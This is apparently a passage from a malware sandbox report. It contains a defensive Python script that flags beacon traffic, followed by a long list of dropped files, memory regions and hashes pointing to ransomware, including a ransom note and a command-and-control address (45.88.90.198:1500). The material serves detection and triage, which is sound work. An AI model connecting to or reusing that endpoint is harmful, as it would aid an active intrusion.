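    [("US", "8.8.8.8:53", "github.com", "udp"),
     ("GB", "20.26.156.215:443", "github.com", "tcp"),
     ("US", "185.199.109.133:443", "raw.githubusercontent.com", "tcp"),
     ("US", "8.8.8.8:53", "ip-api.com", "udp"),
     ("US", "208.95.112.1:80", "ip-api.com", "tcp")]
    + [("DE", "45.88.90.198:1500", "", "tcp")] * 6
    + [("NL", "52.109.89.19:443", "roaming.officeapps.live.com", "tcp"),
       ("US", "2.17.251.17:443", "binaries.templates.cdn.office.net", "tcp"),
       ("N/A", "224.0.0.251:5353", "", "udp")]
    + [("DE", "45.88.90.198:1500", "", "tcp")] * 4
    + [("US", "204.79.197.200:443", "tse1.mm.bing.net", "tcp")]
)

# Assumed reference lists and thresholds for the example.
IP_LOOKUP_SERVICES = {"ip-api.com", "api.ipify.org", "icanhazip.com", "ifconfig.me"}
CODE_HOSTING = {"github.com", "raw.githubusercontent.com", "gitlab.com", "pastebin.com"}
WEB_PORTS = {80, 443}
BEACON_MIN_HITS = 3


def _is_multicast(host: str) -> bool:
    """224.0.0.0/4: mDNS, SSDP and similar local chatter, never a C2 peer."""
    first = int(host.split(".", 1)[0])
    return 224 <= first <= 239


def classify(rows, argv_endpoint=None) -> dict:
    """Split sandbox connection rows into beacon candidates, external-IP
    lookups, payload-hosting domains and the rest. argv_endpoint is an
    optional (host, port) taken from a process command line to correlate with."""
    hits = Counter()            # (host, port, proto) -> connection count
    names = defaultdict(set)    # host -> domains that resolved to it
    queried = set()             # names seen only as DNS queries
    for _country, dest, domain, proto in rows:
        host, port = dest.rsplit(":", 1)
        port = int(port)
        if _is_multicast(host):
            continue
        if port == 53:          # the domain column is the query, not the resolver's name
            queried.add(domain)
            continue
        hits[(host, port, proto)] += 1
        if domain:
            names[host].add(domain)
    seen = queried | {d for ds in names.values() for d in ds}
    # Beacon heuristic: repeated connections to a bare IP on a non-web port.
    beacons = [
        {"host": h, "port": p, "proto": pr, "hits": n}
        for (h, p, pr), n in hits.items()
        if not names[h] and p not in WEB_PORTS and n >= BEACON_MIN_HITS
    ]
    beacons.sort(key=lambda b: -b["hits"])
    known = IP_LOOKUP_SERVICES | CODE_HOSTING
    return {
        "beacons": beacons,
        "ip_lookup": sorted(seen & IP_LOOKUP_SERVICES),
        "payload_hosting": sorted(seen & CODE_HOSTING),
        "argv_match": bool(argv_endpoint) and any(
            (b["host"], b["port"]) == tuple(argv_endpoint) for b in beacons),
        "other": sorted(d for d in seen if d not in known),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(classify(SAMPLE_ROWS, ("45.88.90.198", 1500)), indent=2))
```

The `argv_match` field is the useful pivot: a bare-IP beacon that also appears verbatim on a command line of a process the sample spawned is the endpoint to block and to search for across the fleet, whereas the remaining domains in `other` are the ones to verify as VM background before adding them to any blocklist.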
Files
memory/3364-0-0x00007FF9312F3000-0x00007FF9312F5000-memory.dmp
memory/3364-2-0x000002487A550000-0x000002487A572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uklefe0i.0xb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3364-10-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-12-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-11-0x000002487AA80000-0x000002487AAC6000-memory.dmp
memory/3364-13-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.cmdline
| MD5 | bf5eb993de95591cac9f7cb2cb129d55 |
| SHA1 | d1d1b89e12a30e45378dc561d6b235017c446ae6 |
| SHA256 | 5a872a56c206f1d8522ca30175ba0d8e782f8a54888b54da0235b1dd3ab31f64 |
| SHA512 | bce3cb86e340e1c77073107dabef1ed758723721741663a4387f845eb94a372240d932126183110cfd0ae44d062272c7398e84c62972e430ccdbe609c798644c |
\??\c:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.0.cs
| MD5 | 60c0d4aebef0d650d89729e1bf02de63 |
| SHA1 | 4f1499e94be62af8a4ece3a8c505b3766c338ff7 |
| SHA256 | 0b6e580ba0c5bbb2ac19e2fe91bacb79d1b18cab8c07150e6a944b6ace5d7799 |
| SHA512 | 9e6233b5c2e2cf6ce4b883b33349541c5e7f6f75f711af37d352df8b72d70ac3d123cdccd2fed674d69da5fad3e27de9a7acc92864d47a69d6f8a6d98867760a |
\??\c:\Users\Admin\AppData\Local\Temp\r3ebudtm\CSCA34A7BD2B97740449C58EA6BA518F6C.TMP
| MD5 | 8bd4989c6432a186e9b39f94bb1c3d2a |
| SHA1 | ceb5fb53c3739f9a94423baf44308f3f8d61dc31 |
| SHA256 | a9dfb58eef5242cb72d09de9931e6cc70ad86c2e6ed8ecaa9444e255c101d4b1 |
| SHA512 | 171d964951984147fa0f4e8dc8769b9d126e8297eb3082d80dd6e93d7b606c38d29128a56a89a82075d669eeb463e714821a96ce2f80547da6c6efb15121aac5 |
C:\Users\Admin\AppData\Local\Temp\RES5A07.tmp
| MD5 | 65efb3e7a992c7a926c6415de45c6055 |
| SHA1 | ee94047f341f8c6650010ebb4d4611cbe8262ccc |
| SHA256 | cd9546051c4bbd811f90bca7cca9c73ffd7cacdb06c85eef254f1c751390e1c2 |
| SHA512 | c29daed924083881e00e36d2e53a4a070a10240ea8b5155aebd19e9719521c344e5b35da4f9cc355c654d7ac3be6ac2eb6b426e9fc2010a91fa0c04bc12cd4a9 |
memory/3364-26-0x000002487A5C0000-0x000002487A5C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.dll
| MD5 | 4cd57d4b348d5d1cef73aabc345c2697 |
| SHA1 | 52b9fae1d81c3fce91e2ce047304e951760c5a83 |
| SHA256 | b59df65adb579d687d4e2ba88c1dd1555a9041a4957f1ffd619665673ff999f2 |
| SHA512 | 79dc31edb29a5cf341f41b17730efce5458fe0b1724223c0116a37f8f511018a8641dc7b0b9cfdbf6d0eb656a38970d6eb04ae5c9bffa0c0702a45b6d774c815 |
C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe
| MD5 | e6e056cf4fc25dd7551447172e5338dc |
| SHA1 | 9b88a0cccadd7ae7588f76416987d58ca519a082 |
| SHA256 | 4959d4eb5c0abcb1c05df1b9de000ce34d61308debdff79f3bcac3ac3b0d0e7b |
| SHA512 | 2e72302f479c1fed3ed539e6d8c00dd278f07676b27c3db26afdb7a1a2e60523c51d82b4d75649f21b4644742ab029b9675e27e07237ce015c52518e87b5a44f |
memory/2308-39-0x0000000000BD0000-0x0000000000BE8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d0a4a3b9a52b8fe3b019f6cd0ef3dad6 |
| SHA1 | fed70ce7834c3b97edbd078eccda1e5effa527cd |
| SHA256 | 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31 |
| SHA512 | 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f0e62045515b66d0a0105abc22dbf19 |
| SHA1 | 894d685122f3f3c9a3457df2f0b12b0e851b394c |
| SHA256 | 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319 |
| SHA512 | f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a |
memory/3364-86-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-87-0x00007FF9312F3000-0x00007FF9312F5000-memory.dmp
memory/3364-88-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/3364-93-0x00007FF9312F0000-0x00007FF931DB2000-memory.dmp
memory/2308-95-0x0000000001310000-0x000000000131C000-memory.dmp
memory/2308-96-0x000000001D210000-0x000000001D24A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp8C2E.tmp
| MD5 | 1b942faa8e8b1008a8c3c1004ba57349 |
| SHA1 | cd99977f6c1819b12b33240b784ca816dfe2cb91 |
| SHA256 | 555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc |
| SHA512 | 5aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43 |
memory/4596-101-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-103-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-104-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-102-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-105-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-106-0x00007FF90F630000-0x00007FF90F640000-memory.dmp
memory/4596-107-0x00007FF90F630000-0x00007FF90F640000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | b5f1ca34014057b0885ccbf67fc12b52 |
| SHA1 | d105c94f6755e7ea539f3f2e303ef9141fa57bbb |
| SHA256 | ce95618eafd141e5bcc66d74966c6eb07dd882273fb6fde0b1a3fb082cfb6f1e |
| SHA512 | 50c2ad6679088acf2763c089f68feb0042d5a70537221fe73f42571689f4ff8bdd2d4f1a00a773210fe6483245d325486e06cf94dca692938e44d16fdd5fbff3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WindowSC.exe.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 2327458efd2d21654586727c1ee95704 |
| SHA1 | ff90ba50f34f05acf5a20159f19fdac9da15d3c1 |
| SHA256 | 89c52bf16b984aa076a03007f8215156eb5d4e49584e1258ac84a1aa5a448ea7 |
| SHA512 | 2cf5a33858bbd839c6a77fed0179d9a073b07e7e857133c7d005d39950931e41145f60e08e4f583cf67eccc2a3f0133753b5732792c949ac7d95a0b14bda2914 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 1a1ef3e2028e3240f5573849de53795f |
| SHA1 | b1d8a2b385374c51d204cbcff3e49dd065817478 |
| SHA256 | e389d5cfc3b3edf2295100aecbe562853f0526bc268628551e1bfa48b56deefe |
| SHA512 | 9a37eb6e0cc07ebafd25189f2ded73a556e5ed015b71c23843b237acd25e759517b21f3d1a7651e72544ce887319c3405b8f58e07c3dccae2fad97619d65d8f9 |
C:\Users\Admin\AppData\Local\Temp\TCDEF3F.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |
memory/2308-642-0x000000001CF80000-0x000000001CF8C000-memory.dmp
C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC
| MD5 | d70601e34114dc7b5efd7c8e185f92e6 |
| SHA1 | c56c9b0ffae0b6239d3a2a8a4e0b65590fb8b7a2 |
| SHA256 | a837d92a1fd005992ed3c365821a9c0909621f16a84f650eec66bf7e7e6d4ac8 |
| SHA512 | 505df82c93e14e39fbc413a5f7825aec77c796a9baa6fbb7a4058343a193e93e731a11ef322ae14097c8d525072e0171cf4599ab0578a418e82159576d7b1ceb |
C:\Users\Admin\Desktop\~$w Microsoft Word Document.docx
| MD5 | a497bbe916a069ed592599a6fc2f348e |
| SHA1 | a5d6c4bd11f04a91adcf65686ed952a103d03240 |
| SHA256 | ae4148eb3b8b47cdb70e101d042fdaf718955b2046cf467a2cb15625a4a10df3 |
| SHA512 | d3333b014910cab74ec6f3defdb2a7bf07f153befd38dd517dda9d4878316b93a15ee790e9fb0a2aad833366a36d86cab03b6f6a75485d8f92efbf700a6dbcbf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | bdf3e009c72d4fe1aa9a062e409d68f6 |
| SHA1 | 7c7cc29a19adb5aa0a44782bb644575340914474 |
| SHA256 | 8728752ef08d5b17d7eb77ed69cfdd1fc73b9d6e27200844b0953aeece7a7fdc |
| SHA512 | 75b85a025733914163d90846af462124db41a40f1ce97e1e0736a05e4f09fe9e78d72316753317dabea28d50906631f634431a39384a332d66fa87352ff497f8 |
\??\pipe\LOCAL\crashpad_8_WQRSEGQXVXJQDUCU
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7c16971be0e6f1e01725260be0e299cd |
| SHA1 | e7dc1882a0fc68087a2d146b3a639ee7392ac5ed |
| SHA256 | b1fa098c668cdf8092aa096c83328b93e4014df102614aaaf6ab8dc12844bdc0 |
| SHA512 | dc76816e756d27eedc2fe7035101f35d90d54ec7d7c724ad6a330b5dd2b1e6d108f3ae44cedb14a02110157be8ddac7d454efae1becebf0efc9931fdc06e953c |
C:\Users\Admin\Desktop\How To Decrypt My Files.html
| MD5 | d2dbbc3383add4cbd9ba8e1e35872552 |
| SHA1 | 020abbc821b2fe22c4b2a89d413d382e48770b6f |
| SHA256 | 5ca82cbc4d582a4a425ae328ad12fd198095e2854f4f87b27a4b09e91173a3be |
| SHA512 | bb5e1bbf28c10c077644136b98d8d02bfec3b3e49c0829b4d4570b30e0aea0276eb748f749a491587a5e70141a7653be1d03c463a22e44efecde2e5a6c6e5e66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 36e2d52cfb9e312a186d90a89069ea4e |
| SHA1 | ca132e03a5523600f85053d79a116c0e35cf0e6b |
| SHA256 | e94ac13b54012f3f66b69b78cfb118f06fc540a34ec6a9ee2e066b32a4ca5e0f |
| SHA512 | 966ac12de2448aa365d24ddb821d7ee5679e8770f7ac129539d091fab8430bfa1e32c5c0eeb03387b56b17bfeceabdfbcb9230c5b141d8f3936ab9c8a9245294 |
C:\Users\Admin\AppData\Roaming\Microsoft\Word\AutoRecovery save of New Microsoft Word Document.asd
| MD5 | dbff52897506b862c4f47c7f779a72c1 |
| SHA1 | 23bd2d7045fff2f07c11de95df6833c1463e347d |
| SHA256 | 8c7b1000d1f4837fea20643d92ab0fcb083c27ad3bc55a5c2e460a74543f3949 |
| SHA512 | 25d6a16a815dfa727ead465e7cf0251abf6350ab6f393b4a96e9aa3f6e8ede0c8bfbe9a9e079748ac76ba02518e8f1ef0cc79b869e8f3fc410358a54af5dfc57 |
memory/4596-871-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-874-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-873-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
memory/4596-872-0x00007FF9121D0000-0x00007FF9121E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3a35da1155a803454dd67eff5cd7f812 |
| SHA1 | 98df3e4b56231b8ea2f7391738696adb88cac386 |
| SHA256 | 543db03fbbfb3aeafa635637cf1964453d7772202b0c25231deaa01aa6dd10a7 |
| SHA512 | 475cda79584b4508e6b15e1254174d798f01033300f2d0e03d726769044521502b734b71b5104aa9fa355358c581e6483dea6460b3b39bf7fe7bc9ca99cb94a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7505ce37bbac294980cc56b8eb427788 |
| SHA1 | 866377f201b4cb06014f27eed21a3c76f2fe97e3 |
| SHA256 | 2b7c82435b5088d033e60fe65a39c16bc7bba1285e68f633cb433c8b6b96259d |
| SHA512 | aed228d45d26c68bc17de642917bc69f1a5603dcbb4b29e70bcd7820d14492af4a715f7d0429e8893a731663fbb0a43462d12326ef28e783f36f836b8a59cd4c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a4d7cc9ef054be890ecf659dccc40446 |
| SHA1 | 2415ab272e8207611ca4196f8bd4e5cf8c55d35d |
| SHA256 | a25b4b343c26f144fddb71d312798bb2f5c4120678bf7b5368f9536e9ebebb2a |
| SHA512 | 0152499fb508e4c1d75873f8ae9cea5db83171d3543623e24c9c61c4e30ba0bc7cd55942989a9bee241efb3114537fa7148348111e615ec4c9cdbbd6579fa6aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c26aaf4f063fd348aec25d9bb83a1491 |
| SHA1 | 4d3b43d4e7d5c3a81947ce8429fef3653ac07759 |
| SHA256 | 4e6d7ada41a47f46781e31da063678166bb8243bb5046cba3fddc6456e6dab20 |
| SHA512 | b30c5e5ea2aa70508697e292bde1293ac8ac811d5afc696653c05fa279e654a2aae50077e116e0e43b516c0226720440d23007929afec73e6c7010eec7cd8b5e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 00a455d9d155394bfb4b52258c97c5e5 |
| SHA1 | 2761d0c955353e1982a588a3df78f2744cfaa9df |
| SHA256 | 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed |
| SHA512 | 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f |
memory/2308-1483-0x000000001C1A0000-0x000000001C250000-memory.dmp
memory/2308-1484-0x000000001F990000-0x000000001FEB8000-memory.dmp
memory/2308-1485-0x000000001D380000-0x000000001D40E000-memory.dmp
memory/2308-1489-0x000000001C450000-0x000000001C458000-memory.dmp
memory/2308-1490-0x000000001C350000-0x000000001C35A000-memory.dmp
memory/2308-1491-0x000000001C360000-0x000000001C36E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a0490168f1e6406fd416f4a83181e02 |
| SHA1 | 8c32007b782f879b8c5ae90455306e9ea535a2aa |
| SHA256 | 2281a3c2a0985c153806ec9845f38e3e4c8dd5725fc1596732c4cfa457e30472 |
| SHA512 | 235fe82c16ac3e9bfcae1ff8ba26eaddee72a8e65ecf8e60bc182c80e10b1436b45495b164e4cdc9d8a1ef46600a632f1f134f85b741e65e0886aec3a3c10600 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | e566632d8956997225be604d026c9b39 |
| SHA1 | 94a9aade75fffc63ed71404b630eca41d3ce130e |
| SHA256 | b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0 |
| SHA512 | f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd |
C:\Users\Admin\Desktop\desktop.ini
| MD5 | 9e36cc3537ee9ee1e3b10fa4e761045b |
| SHA1 | 7726f55012e1e26cc762c9982e7c6c54ca7bb303 |
| SHA256 | 4b9d687ac625690fd026ed4b236dad1cac90ef69e7ad256cc42766a065b50026 |
| SHA512 | 5f92493c533d3add10b4ce2a364624817ebd10e32daa45ee16593e913073602db5e339430a3f7d2c44abf250e96ca4e679f1f09f8ca807d58a47cf3d5c9c3790 |
memory/2308-1516-0x000000001BC60000-0x000000001BC76000-memory.dmp
memory/2976-1517-0x0000000000400000-0x0000000000410000-memory.dmp
memory/2976-1518-0x0000000005720000-0x00000000057B2000-memory.dmp
memory/2976-1519-0x0000000005860000-0x00000000058FC000-memory.dmp
memory/2976-1520-0x0000000005EB0000-0x0000000006456000-memory.dmp
memory/2976-1521-0x0000000005A00000-0x0000000005A66000-memory.dmp
memory/1020-1522-0x00000000028D0000-0x0000000002906000-memory.dmp
memory/1020-1523-0x00000000050A0000-0x00000000056CA000-memory.dmp
memory/1020-1524-0x0000000004EE0000-0x0000000004F02000-memory.dmp
memory/1020-1525-0x0000000004F90000-0x0000000004FF6000-memory.dmp
memory/1020-1534-0x0000000005890000-0x0000000005BE7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3cc20b7ec349eb8667d2626f5fefb5b7 |
| SHA1 | f0f95ba2de788c9359a5ca527f7218e6b4c93ae2 |
| SHA256 | 50cdfceac0d03c9faad8cf23e7b48969b572d3bf50ae1f2ac24ec244107865b7 |
| SHA512 | d5a74ea6678569292273ca876938cf4f3e411b5638119cf9335e0331b3ea79749ee0dc1506e37216fb17aee739d49f9137c32e323f22fd7b4150d7bef5f010b2 |
memory/1020-1536-0x0000000005DA0000-0x0000000005DBE000-memory.dmp
memory/1020-1537-0x0000000005DC0000-0x0000000005E0C000-memory.dmp
C:\Users\Admin\Documents\desktop.ini
| MD5 | ecf88f261853fe08d58e2e903220da14 |
| SHA1 | f72807a9e081906654ae196605e681d5938a2e6c |
| SHA256 | cafec240d998e4b6e92ad1329cd417e8e9cbd73157488889fd93a542de4a4844 |
| SHA512 | 82c1c3dd163fbf7111c7ef5043b009dafc320c0c5e088dec16c835352c5ffb7d03c5829f65a9ff1dc357bae97e8d2f9c3fc1e531fe193e84811fb8c62888a36b |
C:\Users\Admin\Videos\desktop.ini
| MD5 | 50a956778107a4272aae83c86ece77cb |
| SHA1 | 10bce7ea45077c0baab055e0602eef787dba735e |
| SHA256 | b287b639f6edd612f414caf000c12ba0555adb3a2643230cbdd5af4053284978 |
| SHA512 | d1df6bdc871cacbc776ac8152a76e331d2f1d905a50d9d358c7bf9ed7c5cbb510c9d52d6958b071e5bcba7c5117fc8f9729fe51724e82cc45f6b7b5afe5ed51a |
C:\Users\Admin\OneDrive\desktop.ini
| MD5 | c193d420fc5bbd3739b40dbe111cd882 |
| SHA1 | a60f6985aa750931d9988c3229242f868dd1ca35 |
| SHA256 | e5bfc54e8f2409eba7d560ebe1c9bb5c3d73b18c02913657ed9b20ae14925adc |
| SHA512 | d983334b7dbe1e284dbc79cf971465663ca29cec45573b49f9ecdb851cdb6e5f9a6b49d710a1553bdae58c764887c65ba13fd75dfdd380c5c9ef9c0024aa3ef0 |
C:\Users\Admin\Downloads\desktop.ini
| MD5 | 3a37312509712d4e12d27240137ff377 |
| SHA1 | 30ced927e23b584725cf16351394175a6d2a9577 |
| SHA256 | b029393ea7b7cf644fb1c9f984f57c1980077562ee2e15d0ffd049c4c48098d3 |
| SHA512 | dbb9abe70f8a781d141a71651a62a3a743c71a75a8305e9d23af92f7307fb639dc4a85499115885e2a781b040cbb7613f582544c2d6de521e588531e9c294b05 |
C:\Users\Admin\Music\desktop.ini
| MD5 | 06e8f7e6ddd666dbd323f7d9210f91ae |
| SHA1 | 883ae527ee83ed9346cd82c33dfc0eb97298dc14 |
| SHA256 | 8301e344371b0753d547b429c5fe513908b1c9813144f08549563ac7f4d7da68 |
| SHA512 | f7646f8dcd37019623d5540ad8e41cb285bcc04666391258dbf4c42873c4de46977a4939b091404d8d86f367cc31e36338757a776a632c7b5bf1c6f28e59ad98 |
C:\Users\Admin\Pictures\desktop.ini
| MD5 | 29eae335b77f438e05594d86a6ca22ff |
| SHA1 | d62ccc830c249de6b6532381b4c16a5f17f95d89 |
| SHA256 | 88856962cef670c087eda4e07d8f78465beeabb6143b96bd90f884a80af925b4 |
| SHA512 | 5d2d05403b39675b9a751c8eed4f86be58cb12431afec56946581cb116b9ae1014ab9334082740be5b4de4a25e190fe76de071ef1b9074186781477919eb3c17 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 8eec1c32ccfdf04a626741c4e574fd33 |
| SHA1 | 69b2a56665bcba4a7cee36dcd3d55904ed34ec6c |
| SHA256 | a5cb3408804d62fc968c43ea77526636c2647a6afc6a8883bf444e9be4df8fe6 |
| SHA512 | e6994f8307e6ed3f1be053d18d439b7a0cee0b93ffb4402c0317a49ac5bcedb97f4164d9f65d7b38d1e2782096298882dd1de53177e481252699dbc7881e12e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 00771d6aeaf300675ebe33da31f77120 |
| SHA1 | ed9318fb80f251605d84b8599c1e336c421c5df9 |
| SHA256 | b35fb2332c8f53593be29ef5cb5ec258afae261f6f7947a28cca1e193f098f51 |
| SHA512 | ba8455f3e477250c552ac1f5f28041fda0596b0441557f7de1b162dc27e351f2562ff22558910a08614d8487d43ab88353a2b9f5a2f422fb91cd5d1e9295c586 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser
| MD5 | a397e5983d4a1619e36143b4d804b870 |
| SHA1 | aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4 |
| SHA256 | 9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4 |
| SHA512 | 4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | c67aca171f989bdbd5bbec4f3362aad4 |
| SHA1 | 70cafa292b4336443301006f8c52e4d601b690d1 |
| SHA256 | 2ccb531bffd651a1e09825677ff8850d6b1e2377ee7952ead4ff0f44436e4b46 |
| SHA512 | c53b4504987d8a4e56e6719a8836ff491466a15cea6f7dc59ea95eece8ec391280083816fd63c75356bc0727d4d4599394afae7ffdf10730f5feaef137d887db |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | b29bcf9cd0e55f93000b4bb265a9810b |
| SHA1 | e662b8c98bd5eced29495dbe2a8f1930e3f714b8 |
| SHA256 | f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4 |
| SHA512 | e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011 |
